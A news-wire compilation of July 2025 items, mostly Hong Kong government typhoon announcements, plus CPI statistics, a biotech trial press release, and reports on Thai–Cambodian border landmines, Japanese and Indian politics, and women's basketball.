Source: Hong Kong Government special administrative region – 4
Attention TV/radio announcers:
Please broadcast the following as soon as possible and repeat it at regular intervals:
Here is an item of interest to swimmers.
The Leisure and Cultural Services Department announced today (July 20) that due to urgent clearance work after the typhoon, Lei Cheng Uk Swimming Pool and Sham Shui Po Park Swimming Pool in Sham Shui Po District have been temporarily closed until further notice.
Source: Hong Kong Government special administrative region – 4
A spokesman for the Development Bureau today (July 20) said that its departments and relevant departments are making all-out efforts to carry out relief work after the passage of Typhoon Wipha, with a view to enabling the community to resume normalcy as soon as possible.
As at 8pm today, the Government’s 1823 Call Centre and the Fire Services Department received 286 and 425 reports of fallen trees respectively. In order to remove fallen trees affecting carriageways and footpaths as early as possible, prior to the issuance of Strong Wind Signal No. 3 by the Hong Kong Observatory, the Highways Department has commenced inspections of carriageways across the territory to immediately remove fallen trees when necessary.
During the passage of Typhoon Wipha, five reports of collapsed scaffolding were received as at 7pm. Among these, the Housing Department removed the scaffolding affecting Choi Hung Road at around 3pm and is making arrangement to dismantle the scaffolding collapsed on Wah King Street near Wah Fu Estate. The Architectural Services Department is striving to remove the scaffolding collapsed on Siu Sai Wan Road, with a view to resuming traffic soonest. There are two separate scaffoldings collapsed at private housing estates at Cloud View Road, North Point and Tin Hau Temple Road respectively. The former is affecting the outdoor carpark of the estate while the latter is affecting Tin Hau Temple Road. The Buildings Department (BD) is proactively following up with relevant owners’ corporations and the scaffolding affecting Tin Hau Temple Road will be removed as soon as possible.
As at 6pm, the BD received 21 reports of building-related incidents, which mainly involve unstable windows. The BD is following up on 15 cases and has referred the remaining six cases to relevant departments for follow up.
As at 8pm, the Drainage Services Department (DSD) has received seven confirmed cases of flooding at Lam Kam Road in Tai Po, Lung Cheung Road near Lung Cheung Mall, Lung Cheung Road near Ngau Chi Wan Village, Tai Hom Road in Wai Tai Sin, Clear Water Bay Road in Sai Kung, Chuk Yuen Road in Wong Tai Sin, and Ko Chiu Road in Yau Tong. The aforementioned cases have been resolved.
As storm surge might lead to a rise in sea levels and increase the flooding risk in the area of Tai Po Market, the DSD made early preparation and implemented various flood prevention measures last night (July 19), including installing temporary water-filled flood barriers near Kwong Fuk Bridge along Lam Tsuen River in Tai Po, and placing water pumps in the vicinity of Tai Po Market and Sam Mun Tsai New Village. No report of flooding at the aforementioned locations has been received so far.
Moreover, Typhoon Wipha did not result in any landslide incidents.
The spokesman said the relevant departments have commenced a new round of special inspections after the issuance of Strong Wind Signal No. 3 by the Hong Kong Observatory to inspect roadside trees, structures (including external walls and signboards), slopes and construction sites, etc. to identity locations with potential risks after the passage of strong wind to ensure public safety. The Government urges members of the public to remain vigilant when going outdoors, and avoid staying under trees, signboards or structures with signs of concrete spalling, as well as in the vicinity of slopes. They may call the Government’s 1823 hotline to report dangerous trees, slopes and structures.
Source: Hong Kong Government special administrative region – 4
As Typhoon Wipha is moving away from Hong Kong, the Hong Kong Observatory issued the Strong Wind Signal No. 3 at 7.40pm today (July 20). It replaced the No. 8 Southeast Gale or Storm Signal at 4.10pm today.
As at 7pm today, the Home Affairs Department has opened 34 temporary shelters in various districts and 277 people have sought refuge at the shelters.
As at 8pm today, the Government’s 1823 Call Centre and the Fire Services Department received 286 reports and 425 reports of fallen trees respectively, while the Drainage Services Department has received seven confirmed flooding cases. In addition, no report of landslide has been received so far.
According to the Hospital Authority, as at 7.40pm today, 33 people (18 men and 15 women) have been injured during the typhoon period and received medical treatment at the Accident and Emergency Department of public hospitals.
Source: Hong Kong Government special administrative region – 4
The Hurricane Signal No. 10 issued by the Hong Kong Observatory at 9.20am today (July 20) remains in force.
The Home Affairs Department has so far opened 34 temporary shelters in various districts and 242 people have sought refuge at the shelters.
As at 2pm today, the Government’s 1823 Call Centre and the Fire Services Department received 117 reports and 246 reports of fallen trees respectively. No report of landslide or flooding has been received so far.
According to the Hospital Authority, as at 2pm today, 13 males and eight females have sought medical treatment at the Accident and Emergency Departments at public hospitals so far during the typhoon period.
Source: Hong Kong Government special administrative region – 4
​Ms Winkie Chick will assume the post of District Officer (North) tomorrow (July 21), succeeding Mr Derek Lai.
Since joining the Administrative Service in 2015, Ms Chick has served in various bureaux, including the then Transport and Housing Bureau, the Commerce and Economic Development Bureau and the Education Bureau.
She was the Assistant Secretary (Heritage Conservation) at the Development Bureau before taking up the new post of District Officer (North).
Source: Hong Kong Government special administrative region – 4
The Hurricane Signal No. 10 issued by the Hong Kong Observatory at 9.20am today (July 20) remains in force.
The Home Affairs Department has so far opened 34 temporary shelters in various districts and 234 people have sought refuge at the shelters.
As at 12 noon today, the Government’s 1823 Call Centre and the Fire Services Department received 76 reports and 164 reports of fallen trees respectively. No report of landslide or flooding has been received so far.
According to the Hospital Authority, as at 12 noon today, seven males and seven females have sought medical treatment at the Accident and Emergency Departments at public hospitals so far during the typhoon period.
Source: Hong Kong Government special administrative region – 4
The Hong Kong Observatory replaced the No. 8 Northeast Gale or Storm Signal by the Increasing Gale or Storm Signal No.9 at 7.20am today (July 20).
The Home Affairs Department has so far opened 34 temporary shelters in various districts and 198 people have sought refuge at the shelters.
As at 8am today, the Government’s 1823 Call Centre and the Fire Services Department received two reports and 11 reports of fallen trees respectively. No report of landslide or flooding has been received so far.
According to the Hospital Authority, as at 8am today, one male has sought medical treatment at the Accident and Emergency Departments at public hospitals so far during the typhoon period.
Source: Hong Kong Government special administrative region – 4
The following is issued on behalf of the Hospital Authority:
The Hospital Authority (HA) announces that as the Tropical Cyclone Warning Signal No. 8 has been issued, its general out-patient clinics will be closed today (July 20). Outpatients are advised to make a new appointment after the cancellation of the Tropical Cyclone Warning Signal No. 8. The service of Accident & Emergency Department of public hospitals remains normal.
The HA has made preparations to cope with the adverse weather conditions and established contingency plans for inclement weather. Drills have been conducted to ensure uninterrupted medical services across all public hospitals. Also, the HA has reminded all clusters to conduct a comprehensive review of their preparedness to effectively respond to adverse weather conditions.
All clusters have allocated additional manpower, food and medical supplies to maintain normal hospital operations. Enhanced inspections have been carried out at various locations within public hospitals, including potential flood-prone areas, drainage systems and trees. Furthermore, contractors of HA construction sites have been instructed to implement proper reinforcement and safety precautionary measures against strong wind and heavy rain to minimise the impact of severe weather.
The HA Major Incident Control Centre will closely monitor the operations of all hospitals and maintain close communication with relevant government departments to ensure public hospital services remain unaffected during adverse weather conditions.
Source: Hong Kong Government special administrative region – 4
Attention duty announcers, radio and TV stations:
Please broadcast the following special announcement immediately, and repeat it at frequent intervals:
“The Social Welfare Department announces that as Tropical Cyclone Warning Signal No. 8 or above is now hoisted, all welfare services units of the department, services units providing after school care programmes for primary school children and elderly services centres will not open to the public. After the No. 8 signal is cancelled, those centres and units that normally operate on Sundays and public holidays will resume normal operation in two hours, if the weather and conditions permit.”
Source: Hong Kong Government special administrative region – 4
As the Tropical Cyclone Warning Signal No. 8 or above is now in force, classes of all day schools, including secondary schools, primary schools, special schools, kindergartens, and kindergarten-cum-child care centres, are suspended today (July 20). If classes of evening schools are required to be suspended tonight, the Education Bureau will make the announcement in due course.
Source: Hong Kong Government special administrative region – 4
As Tropical Cyclone Warning Signal No. 8 (T8) will soon be in force, the Labour Department (LD) today (July 19) reminded employers to make work arrangements for employees during and after tropical cyclone warnings, rainstorm warnings and extreme conditions, including arrangements on reporting for duty, release from work, resumption of work and remote work (if applicable).
An LD spokesman said, “In drawing up and implementing the work arrangements, apart from factors such as operational needs of establishments, employers should give prime consideration to employees’ safety and the feasibility of employees travelling to and from their workplaces. Employers should also give consideration as much as possible to the different situations faced by individual employees, such as their place of residence and the road and traffic conditions in the vicinity, and adopt a sympathetic and flexible approach with due regard to their actual difficulties and needs. For example, employers may permit employees who have difficulties in returning to workplaces to work remotely (if applicable) or allow more time for them to report for duty and resume work.”
If the Government makes an extreme conditions announcement, apart from those required by employers to report for duty at workplaces, employees are advised to stay in the place they are currently in or in safe places when extreme conditions are in force, instead of heading for work. Employees who have already reported for duty at workplaces could continue to work as usual in a safe manner. If the workplaces are in danger, employers should release staff from work early under feasible conditions and in a safe manner, or make available a safe place as temporary shelter for employees. If the working time ends while extreme conditions are still in force, employers can release employees from workplaces in a safe manner or provide a suitable area as temporary shelter for those still at workplaces.
If it is necessary for employees to report for duty at workplaces under adverse weather or extreme conditions, employers should work out arrangements for their transportation, safety, meals, rest places and more. If public transport services are suspended or limited when there is a T8 signal or higher, or extreme conditions are in force, employers should provide safe transport services for employees travelling to and from workplaces, or grant them an extra travelling allowance.
The spokesman reminded employers to observe the statutory liabilities and requirements under the Employment Ordinance, Occupational Safety and Health Ordinance, Factories and Industrial Undertakings Ordinance, Employees’ Compensation Ordinance and Minimum Wage Ordinance.
The LD has published the “Code of Practice in Times of Adverse Weather and ‘Extreme Conditions’”, which provides the major principles, reference guidelines and information on relevant legislation on making work arrangements for the reference of employers and employees. The booklet can be obtained from branch offices of the Labour Relations Division or downloaded from the department’s webpage (www.labour.gov.hk/eng/public/wcp/Rainstorm.pdf).
Source: Hong Kong Government special administrative region – 4
Attention duty announcers, radio and TV stations:
Please broadcast the following as soon as possible and repeat it at suitable intervals:
The Marine Department has received notification from the Hong Kong Pilots Association Limited that due to the tropical cyclone, the pilotage service will be suspended from 10pm today (July 19). Shipowners, agents, masters and other port users are advised to pay attention.
Source: Hong Kong Government special administrative region – 4
Attention TV & Radio Announcers:
The Leisure and Cultural Services Department announced that the event IAC 2025: “Ace Agent’s Writing class” Parent-child Creative Workshop scheduled for tomorrow at Cultural Activities Hall, Sai Wan Ho Civic Centre at 3pm has been postponed due to the issuance of Typhoon Cyclone Warning Signal No. 8.
For enquiries, please call 2550 7309 (Sai Wan Ho Civic Centre)
Source: Hong Kong Government special administrative region – 4
Attention duty announcers, radio and TV stations:
Please broadcast the following as soon as possible and repeat it at suitable intervals:
As the Hong Kong Observatory will issue Tropical Cyclone Warning Signal No. 8 tomorrow (July 20), the Government announced that the Children Community Vaccination Centre (CCVC) and Private Clinic COVID-19 Vaccination Stations (PCVSs) under the COVID-19 Vaccination Programme will remain closed tomorrow and their vaccination service will be suspended.
If the Tropical Cyclone Warning Signal No. 8 is cancelled before 1pm tomorrow, the CCVC and PCVSs will reopen and resume vaccination service two hours after the cancellation and they will operate until the normal closing time.
Affected persons can make a new vaccination appointment through the booking system on the website of the COVID-19 Vaccination Programme (booking.covidvaccine.gov.hk) after the scheduled time of the original booking.
Source: Hong Kong Government special administrative region – 4
​The Innovate and Lead – The New Wave Logistics Competition, funded under the Logistics Promotion Funding Scheme of the Maritime and Aviation Training Fund launched by the Transport and Logistics Bureau (TLB) and organised by the Hong Kong Association of Freight Forwarding and Logistics (HAFFA), was held today (July 19). The competition attracted 40 secondary school teams from Hong Kong and Macao, providing students with the opportunity to propose innovative solutions for the future development of the logistics industry in three specific themes, namely smart city logistics, sustainable logistics and Environment, Social and Governance (ESG) as well as entrepreneurship and innovation in logistics.
In the Action Plan on Modern Logistics Development promulgated in 2023, the TLB proposed to strengthen the promotion of the modern logistics industry with a view to enriching the younger generation’s understanding of the latest developments in the logistics sector, thereby inspiring their interest in and attracting them to join the industry. This competition provides a platform for students to unleash their creativity on one hand and promotes the innovation of the industry on the other hand.
The participating teams showcased their solutions to the public and the professional judging panel via exhibitions at the Grand Hall of Hong Kong Science Park. The judging panel evaluated each team based on their understanding of industry development challenges, the feasibility and practicability of their proposed solutions, and so on. Gold, silver, bronze, and merit prizes, as well as an overall grand champion and Cathay Cargo merit prize were awarded to the winning teams to recognise their efforts and creativity.
At the award ceremony, the Under Secretary for Transport and Logistics, Mr Liu Chun-san, pointed out that the logistics sector has been advancing towards smart development, digitalisation and modernisation. He expressed his trust that the competition helped students experience the professionalism, innovation and vitality of the modern logistics industry. He also encouraged students to participate in the Internship Scheme on Modern Logistics to gain personal exposure to the interesting work of the industry and understand its various opportunities for career development.
To better equip students for the competition, HAFFA arranged a series of logistics-related seminars, simulation and virtual-reality trainings, as well as workshops ahead of the event. Senior industry professionals were invited to share their knowledge and insights, with a view to helping students gain an understanding of the latest developments in the modern logistics industry.
The event was fully supported by the logistics sector and academia, demonstrating the collaborative effort across sectors to promote young talent development in the logistics industry. Members of the Hong Kong Logistics Development Council also visited the exhibitions this morning to understand the details and ideas behind each participating team’s creative proposal and spoke highly of the students for their creativity. For more information on the Innovate and Lead – The New Wave Logistics Competition, please visit haffa.aiatros.com/.
Source: Hong Kong Government special administrative region – 4
Attention TV/radio announcers:
Please broadcast the following as soon as possible:
Here is an item of interest to swimmers.
The Leisure and Cultural Services Department announced today (July 19) that due to big waves, red flags have been hoisted at Cheung Chau Tung Wan Beach and Silver Mine Bay Beach in Islands District. Beachgoers are advised not to swim at these beaches.
Source: Hong Kong Government special administrative region – 4
The Chief Secretary for Administration, Mr Chan Kwok-ki, and the Secretary for Home and Youth Affairs, Miss Alice Mak, officiated at the kick-off ceremony of the first cohort of the “She Inspires” Mentorship Programme launched by the Home and Youth Affairs Bureau today (July 19).
In his speech, Mr Chan noted that this year marks the 30th anniversary of the adoption of the Beijing Declaration and Platform for Action at the United Nations’ Fourth World Conference on Women. The two milestone documents have laid the foundation for the advancement of women’s causes globally. Hong Kong, as the international gateway for the country, has consistently taken concrete actions to promote women’s development. The launch of the Programme represented a significant step forward in this endeavour.
Mr Chan also encouraged the mentees of the Programme, “I hope that all of you will not only possess professional expertise, but also resilience and a heart that cares for our country and gives back to society. Today, you benefit from the selfless guidance of your mentors. I hope that when you become leaders in the future, you will also be beacons for the next generation, your juniors, passing on the power of women.”
Miss Mak expressed her gratitude to the mentors and mentees for their active participation, as well as to the local universities for their assistance and support.
She said, “Looking forward, we hope this Programme will become a source of strength which encourages more women to realise their potential in the workplace. I look forward to seeing each mentee to face challenges bravely, discover their talents, and achieve excellence in their future careers under the guidance of mentors.”
Also officiating at the ceremony were the Chairperson of the Women’s Commission (WoC), Dr Eliza Chan, and the Permanent Secretary for Home and Youth Affairs, Ms Shirley Lam. Members of the WoC, mentors and mentees participating in the Programme as well as representatives from local universities also attended the ceremony.
The Programme matches local female university students who aspire to pursue a career in the professional or business sectors with women leader mentors, and provides relevant training and activities to help them enhance their skills, build confidence and network to thrive in their future career and nurture the future strength that “hold up half the sky”. For the first cohort of the Programme, over 50 women leaders participated as mentors, and more than 250 applications from students were received, with more than 80 of them being selected as mentees.
Source: Hong Kong Government special administrative region
Cluster of Vancomycin Resistant Enterococci cases in Princess Margaret Hospital The hospital will continue the enhanced infection control measures and closely monitor the situation of the ward concerned. The cases have been reported to the Hospital Authority Head Office and the Centre for Health Protection for necessary follow-up.
Issued at HKT 17:50
NNNN
Source: Government of India
Source: Government of India (4)
Thailand has accused Cambodia of recently placing landmines in a disputed border area after three soldiers were injured, but Phnom Penh said they had veered off agreed patrol routes and triggered a mine left behind from decades of war.
Thai authorities made the claim after three soldiers were injured, with one losing a foot, by a landmine explosion while on a routine patrol on July 16 on the Thai side of the disputed border area between Ubon Ratchathani and Cambodia’s Preah Vihear province.
Cambodia’s Defence Ministry denied that new mines had been planted, saying in a statement on Sunday the soldiers had strayed from agreed patrol routes into areas that contain unexploded landmines. The country is littered with landmines laid during decades of war.
Thailand’s army said on Monday that 10 freshly laid Russian-made PMN-2 type landmines, which are not used or stockpiled by Thailand, were found between July 18 and July 20 in areas near where the soldiers were injured.
“This is a clear violation of the sovereignty and territorial integrity of the Kingdom of Thailand and an outright breach of principles that are fundamental to international law,” Maratee Nalita Andamo, deputy spokesperson for the Thai Foreign Ministry, said on Monday in Bangkok.
Data from the Cambodia Mine Action Centre, which estimates there are still 4 to 6 million landmines scattered across the country, shows five people were killed and a dozen injured by mines and unexploded ordnance in Cambodia in the first four months of 2025.
The area where the mine exploded is near where a Cambodian soldier was killed in May after a brief exchange of gunfire between troops on both sides.
The incident has flared into a broader diplomatic dispute between the Southeast Asian neighbours that has destabilised the Thai government and seen the Prime Minister suspended from office.
Thailand said it will issue a formal condemnation and call for accountability from Cambodia for breaching the anti-landmine convention under the Ottawa Treaty, and the army will also increase vigilance during border patrols.
(Reuters)
Translation. Region: Russian Federal
Source: People’s Republic of China in Russian – People’s Republic of China in Russian –
An important disclaimer is at the bottom of this article.
Source: People’s Republic of China – State Council News
TOKYO, July 21 (Xinhua) — Japanese Prime Minister Shigeru Ishiba vowed on Monday to remain in office despite a major defeat in the House of Councillors (upper house) election where the ruling Liberal Democratic Party (LDP) and its coalition partner failed to secure a majority.
Speaking at a press conference, he acknowledged the poor election results and stressed that he felt a great responsibility. “The most important thing now is to avoid stagnation in national politics,” the prime minister said, promising to make efforts to fulfill the duties befitting a leading party.
His comments come amid growing public discontent over rising living costs and policy mistakes that analysts say contributed to the ruling coalition’s election defeat.
In the current election, Japanese people voted for candidates for 125 of the 248 seats in the House of Councillors. After the final vote count ended Monday morning, the LDP had won only 39 seats, while its partner, the Komeito Party, had won eight. The coalition had planned to win 50 seats, but failed to do so.
Now the coalition’s MPs have 122 seats in the upper house, which is less than the 125 needed for a majority.
Despite the failure, S. Ishiba stressed the need for stability and continuity in the government and officially announced his intention to continue as prime minister. –0–
Please note: This information is raw content obtained directly from the source of the information. It is an accurate report of what the source claims and does not necessarily reflect the position of MIL-OSI or its clients.
.
Source: GlobeNewswire (MIL-OSI)
SEOUL, SOUTH KOREA, July 21, 2025 (GLOBE NEWSWIRE) — S.BIOMEDICS announced encouraging one-year post-transplant results from Phase 1/2a clinical trial evaluating A9-DPC cell therapy for Parkinson’s disease. The data demonstrate a favorable safety and efficacy profile of A9-DPC in 12 participants at 12 months compared to baseline. Participants were divided equally into a low-dose group (3.15 million cells) and a high-dose group (6.30 million cells).
The MDS-UPDRS Part III (off) score, a standard scale for assessing motor symptom severity in Parkinson’s disease, showed a mean decrease (improvement) of 12.7 points in the low-dose group and 15.5 points in the high-dose group at 12 months compared to baseline. There were also improvements in MDS-UPDRS Part I, II and IV scores. The MDS-UPDRS Total (off) score showed mean improvements of 29.0 points and 34.7 points in the low- and high-dose groups, respectively.
Clinical improvements were further supported by changes in the Hoehn and Yahr stage, an ordinal scale categorizing disease severity based on motor function. On average, low-dose recipients improved (decreased) from stage 3.7 to 2.7, while high-dose recipients demonstrated a greater improvement from stage 3.8 to 2.2.
A9-DPC also demonstrated favorable outcomes in other assessments, including the Non-Motor Symptoms Scale (NMSS), the Parkinson’s Disease Questionnaire-39 (PDQ-39) and the Schwab and England Activities of Daily Living Scale (SEADL). NMSS score improved by 31.7 points in the low-dose group and by 35.8 points in the high-dose group.
[18F]FP-CIT PET imaging showed an overall increase in putamen DAT signals, with greater increases observed in the high-dose group, providing additional evidence for the underlying mechanism of action. Notably, there was a statistically significant correlation between improvements in MDS-UPDRS Part III (off) scores and increased DAT signal in the posterior dorsal putamen, supporting the hypothesis of synaptic restoration through engrafted cells.
In terms of safety, the safety profile remained favorable. No treatment-emergent adverse events (TEAEs) related to the transplanted cells were reported. Tumorigenesis, cell overgrowth, or ectopic cell migration was not observed. Most of TEAEs were mild to moderate. One participant experienced an asymptomatic mild hemorrhage, but no neurological abnormalities or other serious side effects were observed.
“Our data show a consistent positive trend throughout the study period, demonstrating the favorable safety and efficacy profiles. Importantly, increased DAT signals on PET imaging correlated with the observed behavioral recovery, which is very promising in terms of the mechanism of A9-DPC through neuroimaging.” said Prof. Dong-Wook Kim of Yonsei University College of Medicine and CTO of S.BIOMEDICS. “We will continue to present additional data through our ongoing study.”
About A9-DPC and Phase 1/2a clinical trial
A9-DPC (also called TED-A9) is an investigational cell therapy designed to replace ventral midbrain-specific dopaminergic neurons lost in patients with Parkinson’s disease. These ventral midbrain-specific dopaminergic cells are derived from hESCs (human embryonic stem cells) by exclusively utilizing small molecules under strict GMP conditions. A9-DPC represents a significant advancement in the field, offering highly purified dopaminergic cells derived from hESCs. Through a stereotactic surgical procedure, these hESC-derived dopaminergic progenitor (precursor) cells are transplanted into three segments of the putamen: the anterior, middle, and posterior sections, with three tracks per each putamen. Bilateral putamina were treated in a single surgical procedure, with cells injected at three points within each track. After transplantation, the progenitor cells are expected to mature into dopaminergic neurons, enhancing neural connectivity and restoring motor function in patients.
The Phase 1/2a clinical trial enrolled 12 participants diagnosed with Parkinson’s disease for more than 5 years who exhibited motor complications such as wearing off, freezing of gait, or dyskinesia. Participants ranged from 50 to 75 years old. An initial low-dose cohort (3.15 million cells) of three patients was first enrolled to assess initial safety including dose-limiting toxicity (DLT) over three months. After confirming safety, an additional three patients received the high dose (6.30 million cells) for similar evaluation. With continued safety confirmation, three more patients were enrolled in each dose group, totaling 12 participants. The final participant received A9-DPC in February 2024.
The primary objective of the Phase 1/2a trial is to evaluate the safety and exploratory efficacy for up to two years post-transplantation, with safety follow-up continuing for an additional three years.
About S.BIOMEDICS
Established in 2005, S.BIOMEDICS Co., Ltd. is a leading innovator in stem cell therapy, specializing in regenerative medicine powered by data-driven biology. Leveraging two core platform technologies, S.BIOMEDICS is currently advancing seven cell therapy programs targeting intractable diseases. Several of its lead candidates are now in clinical development, demonstrating the company’s leadership in advancing cell-based medicine:
As the foremost authority and trailblazer in Parkinson’s disease treatment in South Korea, S.BIOMEDICS is setting the national standard for cell therapy innovation.
More Information about the Phase 1/2a clinical trial for Parkinson’s disease is available at ClinicalTrials.gov (NCT05887466).
For more information about S.BIOMEDICS, visit https://www.sbiomedics.com/. S.BIOMEDICS is listed on the Korea Exchange and is also the founder and controller of S.THEPHARM (www.sthepharm.com), a corporation specializing in anti-aging products such as HA-Filler.
Media contact
Brand: S.BIOMEDICS
Contact: Sarang Kim
Email: ksr7744@sbiomedics.com
Website: https://www.sbiomedics.com
Source: Hong Kong Government special administrative region
Attention duty announcers, radio and TV stations:
Please broadcast the following as soon as possible and repeat it at suitable intervals:
As Tropical Cyclone Warning Signal No. 3 has been cancelled, the Home Affairs Department’s emergency hotline 2572 8427 has ceased to operate.
Source: Hong Kong Government special administrative region
Consumer Price Indices for June 2025
On a seasonally adjusted basis, the average monthly rate of change in the Composite CPI for the 3-month period ending June 2025 was 0.0%, and that for the 3-month period ending May 2025 was -0.1%. Netting out the effects of all Government’s one-off relief measures, the corresponding rates of change were both 0.1%.
Analysed by sub-index, the year-on-year rates of increase in the CPI(A), CPI(B) and CPI(C) were 2.1%, 1.3% and 0.9% respectively in June 2025, as compared to 2.8%, 1.6% and 1.2% respectively in May 2025. Netting out the effects of all Government’s one-off relief measures, the year-on-year rates of increase in the CPI(A), CPI(B) and CPI(C) were 1.5%, 0.9% and 0.7% respectively in June 2025, as compared to 1.3%, 0.8% and 0.8% respectively in May 2025.
On a seasonally adjusted basis, for the 3-month period ending June 2025, the average monthly rates of change in the CPI(A), CPI(B) and CPI(C) were all 0.0%. The corresponding rates of change for the 3-month period ending May 2025 were all -0.1%. Netting out the effects of all Government’s one-off relief measures, the average monthly rates of change in the seasonally adjusted CPI(A), CPI(B) and CPI(C) for the 3-month period ending June 2025 were 0.2%, 0.1% and 0.0% respectively, and the corresponding rates of change for the 3-month period ending May 2025 were 0.1%, 0.1% and 0.0% respectively.
Amongst the various components of the Composite CPI, year-on-year increases in prices were recorded in June 2025 for housing (2.8%), transport (1.9%), electricity, gas and water (1.6%), alcoholic drinks and tobacco (1.4%), meals out and takeaway food (1.4%), miscellaneous goods (1.3%), and miscellaneous services (1.0%).
On the other hand, year-on-year decreases in the components of the Composite CPI were recorded in June 2025 for clothing and footwear (-4.1%), durable goods (-2.5%), and basic food (-0.4%).
For the first half of 2025 as a whole, the Composite CPI rose by 1.7% over a year earlier. The respective increases in the CPI(A), CPI(B) and CPI(C) were 2.3%, 1.5% and 1.2% respectively. The corresponding increases after netting out the effects of all Government’s one-off relief measures were 1.2%, 1.5%, 1.0% and 1.0% respectively.
In the second quarter of 2025, the Composite CPI rose by 1.8% over a year earlier, while the CPI(A), CPI(B) and CPI(C) rose by 2.4%, 1.6% and 1.3% respectively. The corresponding increases after netting out the effects of all Government’s one-off relief measures were 1.1%, 1.4%, 1.0% and 0.9% respectively.
For the 12 months ending June 2025, the Composite CPI was on average 1.8% higher than that in the preceding 12-month period. The respective increases in the CPI(A), CPI(B) and CPI(C) were 2.3%, 1.6% and 1.4% respectively. The corresponding increases after netting out the effects of all Government’s one-off relief measures were 1.2%, 1.4%, 1.1% and 1.0% respectively.
Commentary
A Government spokesman said that consumer price inflation stayed modest in June. The underlying Composite CPI increased by 1.0% over a year earlier, same as the preceding month. Price pressures on various major components were contained in general.
Looking ahead, overall inflation should remain modest in the near term, as pressures from domestic costs and external prices should stay broadly in check. The Government will monitor the situation closely.
Further information
The CPIs and year-on-year rates of change at section level for June 2025 are shown in Table 1. The time series on the year-on-year rates of change in the CPIs before and after netting out the effects of all Government’s one-off relief measures are shown in Table 2. For discerning the latest trend in consumer prices, it is also useful to look at the changes in the seasonally adjusted CPIs. The time series on the average monthly rates of change during the latest 3 months for the seasonally adjusted CPIs are shown in Table 3. The rates of change in the original and the seasonally adjusted Composite CPI and the underlying inflation rate are presented graphically in Chart 1.
More detailed statistics are given in the “Monthly Report on the Consumer Price Index”. Users can browse and download this publication at the website of the C&SD (www.censtatd.gov.hk/en/EIndexbySubject.html?pcode=B1060001&scode=270
For enquiries about the CPIs, please contact the Consumer Price Index Section of the C&SD (Tel: 3903 7374 or email: cpi@censtatd.gov.hkIssued at HKT 16:30
NNNN
Source: People’s Republic of China – State Council News
China clinched third place at the 2025 FIBA Women’s Asia Cup with a dominant 101-66 victory over South Korea on Sunday, concluding the first major tournament of its Los Angeles Olympic cycle with a bittersweet result that served as both a disappointment and a crucial learning experience.
While the team secured a podium finish, its title defense was decisively ended a day earlier in the semifinals by a sharp-shooting Japanese team, a defeat that exposed the challenges ahead of China.
Yang Shuyu (front) of China reacts after the semifinal match between China and Japan at the FIBA Women’s Asia Cup 2025 in Shenzhen, south China’s Guangdong Province, July 19, 2025. (Xinhua/Mao Siqian)
The wake-up call was delivered by Japan’s accurate long-range attack, led by 19-year-old point guard Kokoro Tanaka, who posted 21 points in the first quarter alone, hitting five-for-five from beyond the arc.
Japan hit 16 three-pointers in the game, shooting 47.1 percent from deep and scoring 30 more points from beyond the arc than China. The barrage exposed the defensive liabilities of China’s highly anticipated “Twin Towers” lineup.
The pairing of 2.26-meter (7-foot-5) prodigy Zhang Ziyu and 2.11-meter (6-foot-11) Han Xu, dominant in the group stage against Indonesia, South Korea and New Zealand, struggled against Japan’s “small, fast, and agile” style. Zhang’s slower foot speed was frequently exploited to create open space, while Han was often forced to defend multiple perimeter players.
“The ‘Twin Towers’ lineup showed some weaknesses in limiting their three-pointers,” head coach Gong Luming admitted post-game. “Their threes posed a huge threat and created a lot of trouble for us. We will learn from this and seriously think about how our big lineups can adapt to this fast-paced style.”
Center Han Xu acknowledged the team’s shortcomings after the loss. “Against a quick team like Japan, you need to be efficient to limit their fast breaks and threes, but our defense was not good enough,” she said.
Despite the loss, Gong affirmed the team would not abandon its long-term strategy.
“We will not change our plans just because we lost this game; that would be wrong. We are preparing for the 2028 Los Angeles Olympics and will continue to build on the experience gained today,” Gong said.
For 18-year-old Zhang, the tournament was a glimpse of what’s to come. She finished her senior team debut averaging an impressive 15.6 points and 5.6 rebounds. While her dominance in the paint is clear, so are the areas for improvement.
“Her potential is huge, but the public’s expectations for her are too high right now,” Gong said. “The overall offensive and defensive chemistry with her is still lacking… but this is a process we must go through.”
The tournament was also an emotional one for Han, who broke down in a press conference after the semifinal loss. Having faced public pressure for skipping overseas leagues to focus on national team duties, she stated her intention to play abroad in the future.
“After this year’s major tournaments are over, if there is an opportunity to play in an overseas league, I will do my best to fight for it,” Han said.
“This might be my last time wearing the national team jersey,” said China’s veteran forward Huang Sijing. “Looking back on my 10 years representing China, there have been both joys and regrets, but as I reach the twilight of my career, what I feel most is pride.”
Although she expressed disappointment with the team’s result at the Asia Cup, Huang acknowledged the broader context. “The team is undergoing a generational transition, and we’re also adapting to a new coaching philosophy. Given we’ve only had three months to work together, I think we’ve already made good progress.”
As China left Shenzhen with a bronze medal instead of the desired gold, the coach framed the outcome as a necessary wake-up call. He also noted that he had picked up some tactical ideas from Japan, Australia and South Korea during the tournament – insights he said would be valuable for the development of China’s younger players.
With only three months together, the new squad learned where it stands and the work required to return to the top of the podium.
“We certainly saw a lot of our own shortcomings, but the experience gained is more important for the team’s future. I hope the team maintains its fighting spirit… that is the foundation for our future development,” Gong added.
Source: Government of India
Source: Government of India (4)
The Lok Sabha was adjourned until 2 PM on Monday following uproar by Opposition MPs demanding a discussion on the recent Pahalgam terror attack and the government’s response through Operation Sindoor.
The House convened at 11 AM but was first adjourned until noon after Opposition members disrupted proceedings, insisting on a statement from Prime Minister Narendra Modi regarding the developments surrounding the attack and Operation Sindoor.
Expressing his disappointment at the disruptions, Lok Sabha Speaker Om Birla appealed to members to maintain decorum and allow discussions to proceed.
“This is the Question Hour, and the government is willing to discuss every issue. The House should function, and discussions must take place as per the rules and procedures,” Birla said.
Despite his appeal, continued sloganeering by Opposition members forced the Speaker to adjourn the House again until 2 PM.
When the House reconvened, protests resumed after the officiating Speaker informed members that Speaker Om Birla had not granted assent to any of the adjournment motions.
Defence Minister Rajnath Singh reiterated the government’s willingness to engage in dialogue, “The government is completely ready for discussion on any issue.”
Responding to the ongoing disruptions, Union Parliamentary Affairs Minister Kiren Rijiju said, “A meeting of the Business Advisory Committee will be held at 2:30 PM to finalise the agenda for discussion. The government is ready, but they (Opposition MPs) are protesting in the Well of the House. This is not the right way to begin the Monsoon Session.”
Following the adjournment, Leader of the Opposition in the Lok Sabha, Rahul Gandhi, expressed concern over being denied the opportunity to speak, “The question is – why is the Defence Minister allowed to speak in the House while Opposition members, including me as LoP, are not? This is a new approach. Conventionally, if ministers can speak, the Opposition should also be allowed.”
Congress MP Priyanka Gandhi Vadra echoed the sentiment, stating, “If the government is truly ready for discussion, then they should let the Leader of the Opposition speak. He stood up to speak, and he should be allowed to do so.”
